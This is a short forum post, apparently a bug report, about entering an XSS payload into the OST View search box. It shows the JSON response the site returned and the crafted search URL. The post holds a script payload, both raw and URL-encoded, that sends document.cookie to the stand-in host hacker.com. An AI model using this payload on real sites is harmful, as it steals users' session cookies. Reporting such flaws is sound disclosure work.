Start a new topic

JSON-Response after XSS at OST View Search

After inserting following XSS-Code 2 times in the OST View search, I get a JSON Response:


JSON-Reponse:

{"success":true,"data":{"redirect_url":"/chain-id/1409/block/","result_type":"redirect_url"}}


XSS Code:


<script>document.write('<img src="http://www.hacker.com/' + document.cookie + '">');</script>



URL:

https://view.ost.com/search?q=%3Cscript%3Edocument.write%28%27%3Cimg+src%3D%22http%3A%2F%2Fwww.hacker.com%2F%27+%2B+document.cookie+%2B+%27%22%3E%27%29%3B%3C%2Fscript%3E




Login to post a comment